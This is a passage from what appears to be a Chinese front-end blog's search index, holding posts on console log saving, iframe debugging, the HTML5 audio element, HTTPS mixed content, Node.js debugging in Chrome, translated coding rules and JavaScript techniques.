项目地址:https://github.com/wangduanduan/log4b.git\n","permalink":"https://wdd.js.org/posts/2018/02/save-console-log-as-file/","summary":"本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websoekt推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发区分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 
使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部执行行日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.","title":"终于找到你!如何将前端console.log的日志保存成文件?"},{"content":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)\n","permalink":"https://wdd.js.org/posts/2018/02/debug-code-in-iframe/","summary":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)","title":"如何浏览器里调试iframe里层的代码?"},{"content":" 我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. 
\u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; type=\u0026#39;audio/mp3\u0026#39; /\u0026gt; \u0026lt;/audio\u0026gt; 你可以看出他们在Chrome里表现的差异\n关于audio标签支持的音频类型,可以参考Audio#Supported_audio_coding_formats\n3. 常用属性 autoplay: 音频流文件就绪后是否自动播放\npreload: \u0026ldquo;none\u0026rdquo; | \u0026ldquo;metadata\u0026rdquo; | \u0026ldquo;auto\u0026rdquo; | \u0026quot;\u0026quot;\n\u0026ldquo;none\u0026rdquo;: 无需预加载 \u0026ldquo;metadata\u0026rdquo;: 只需要加载元数据,例如音频时长,文件大小等。 \u0026ldquo;auto\u0026rdquo;: 自动优化下载整个流文件 controls: \u0026ldquo;controls\u0026rdquo; | \u0026quot;\u0026quot; 是否需要显示控件\nloop: \u0026ldquo;loop\u0026rdquo; or \u0026quot;\u0026quot; 是否循环播放\nmediagroup: string 多个视频或者音频流是否合并\nsrc: 音频地址\n4. API(重点) load(): 加载资源 play(): 播放 pause(): 暂停 canPlayType(): 询问浏览器以确定是否可以播放给定的MIME类型 buffered():指定文件的缓冲部分的开始和结束时间 5. 常用事件:Media Events(重点) 事件名 何时触发 loadstart 开始加载 progress 正在加载 suspend 用户代理有意无法获取媒体数据,无法获取整个文件 abort 主动终端下载资源并不是由于发生错误 error 获取资源时发生错误 play 开始播放 pause 播放暂停 loadedmetadata 刚获取完元数据 loadeddata 第一次渲染元数据 waiting 等待中 playing 正在播放 canplay 用户代理可以恢复播放媒体数据,但是估计如果现在开始播放,则媒体资源不能以当前播放速率直到其结束呈现,而不必停止进一步缓冲内容。 canplaythrough 用户代理估计,如果现在开始播放,则媒体资源可以以当前播放速率一直呈现到其结束,而不必停止进一步的缓冲。 timeupdate 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变。 ended 播放结束 ratechange 媒体播放速度改变 durationchange 媒体时长改变 volumechange 媒体声音大小改变 6. Audio DOM 属性(重点) 6.1. 只读属性 duration: 媒体时长,数值, 单位s ended: 是否完成播放,布尔值 paused: 是否播放暂停,布尔值 6.2. 
其他可读写属性(重点) playbackRate: 播放速度,大多数浏览器支持0.5-4, 1表示正常速度,设置该属性可以修改播放速度 volume:0.0-1.0之间,设置该属性可以修改声音大小 muted: 是否静音, 设置该属性可以静音 currentTime:指定播放位置的秒数 // 你可以使用元素的属性seekable来决定媒体目前能查找的范围。它返回一个你可以查找的TimeRanges 时间对象。 var mediaElement = document.getElementById(\u0026#39;mediaElementID\u0026#39;); mediaElement.seekable.start(); // 返回开始时间 (in seconds) mediaElement.seekable.end(); // 返回结束时间 (in seconds) mediaElement.currentTime = 122; // 设定在 122 seconds mediaElement.played.end(); // 返回浏览器播放的秒数 以下方法可以使音频以2倍速度播放。\n\u0026lt;audio id=\u0026#34;wdd\u0026#34; src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;script\u0026gt; var myAudio = document.getElementById(\u0026#39;wdd\u0026#39;); myAudio.playbackRate = 2; \u0026lt;/script\u0026gt; 7. 常见问题及解决方法 录音无法拖动,播放一端就自动停止: https://wenjs.me/p/about-mp3progress-on-audio 如何隐藏Audio的下载按钮:https://segmentfault.com/a/1190000009737051 想找一个简单的录音播放插件: https://github.com/kolber/audiojs 8. 参考资料 W3C: the-audio-element\nwikipedia: HTML5 Audio\nW3C: HTML/Elements/audio\nNative Audio in the browser\nHTMLMediaElement.playbackRate\n使用 HTML5 音频和视频\n","permalink":"https://wdd.js.org/posts/2018/02/audio-heart-detail/","summary":"我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. 
\u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.","title":"Audio 如果你愿意一层一层剥开我的心"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。\n","permalink":"https://wdd.js.org/posts/2018/02/you-dont-know-https-and-http/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. 
HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。","title":"可能被遗漏的https与http的知识点"},{"content":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开连接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. 
To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也回输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","title":"直接在Chrome DevTools调试Node.js"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编​​写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 
重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是浪费时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?”但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。 如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。 ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2018/02/few-simple-rules-for-good-coding-my-15-years-experience/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 
代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 
作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1. 惰性载入函数 假设有一个方法X,在A类浏览器里叫A,在b类浏览器里叫B,有些浏览器并没有这个方法,你想实现一个跨浏览器的方法。\n惰性载入函数的思想是:在函数内部改变函数自身的执行逻辑\nfunction X(){ if(A){ return new A(); } else{ if(B){ return new B(); } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } } 换一种写法\nfunction X(){ if(A){ X = function(){ return new A(); }; } else{ if(B){ X = function(){ return new B(); }; } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } return new X(); } 2. 防篡改对象 2.1. 不可扩展对象 Object.preventExtensions // 下面代码在谷歌浏览器中执行 \u0026gt; var person = {name: \u0026#39;wdd\u0026#39;}; undefined \u0026gt; Object.preventExtensions(person); Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; person.age = 10 10 \u0026gt; person Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; Object.isExtensible(person) false 2.2. 密封对象Object.seal 密封对象不可扩展,并且不能删除对象的属性或者方法。但是属性值可以修改。\n\u0026gt; var one = {name: \u0026#39;hihi\u0026#39;} undefined \u0026gt; Object.seal(one) Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; one.age = 12 12 \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; delete one.name false \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} 2.3. 冻结对象 Object.freeze 最严格的防篡改就是冻结对象。对象不可扩展,而且密封,不能修改。只能访问。\n3. 高级定时器 3.1. 函数节流 函数节流的思想是:某些代码不可以没有间断的连续重复执行\nvar processor = { timeoutId: null, // 实际进行处理的方法 performProcessing: function(){ ... }, // 初始化调用方法 process: function(){ clearTimeout(this.timeoutId); var that = this; this.timeoutId = setTimeout(function(){ that.performProcessing(); }, 100); } } // 尝试开始执行 processor.process(); 3.2. 
中央定时器 页面如果有十个区域要动态显示当前时间,一般来说,可以用10个定时来实现。其实一个中央定时器就可以搞定。\n中央定时器动画 demo地址:http://wangduanduan.coding.me/my-all-demos/ninja/center-time-control.html\nvar timers = { timerId: 0, timers: [], add: function(fn){ this.timers.push(fn); }, start: function(){ if(this.timerId){ return; } (function runNext(){ if(timers.timers.length \u0026gt; 0){ for(var i=0; i \u0026lt; timers.timers.length ; i++){ if(timers.timers[i]() === false){ timers.timers.splice(i, 1); i--; } } timers.timerId = setTimeout(runNext, 16); } })(); }, stop: function(){ clearTimeout(timers.timerId); this.timerId = 0; } }; 参考书籍: 《javascript高级程序设计》 《javascript忍者秘籍》\n","permalink":"https://wdd.js.org/posts/2018/02/js-high-skills/","summary":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1.","title":"JavaScript 高级技巧"},{"content":"0.1. 先看题:mean的值是什么? 
var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.length; console.log(mean); 这样写有几个好处。\n循环的终止条件简单且明确 即使在循环体内修改了数组,也能有效的终止循环。否则就可能变成死循环。 编译器很难保证重启计算scores.length是安全的。 提前确定了循环终止条件,避免多次计算数组长度。这个可能会被一些浏览器优化。 ","permalink":"https://wdd.js.org/posts/2018/02/i-realy-dont-know-js/","summary":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.","title":"突然觉得自己好像没学过JS"},{"content":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. 
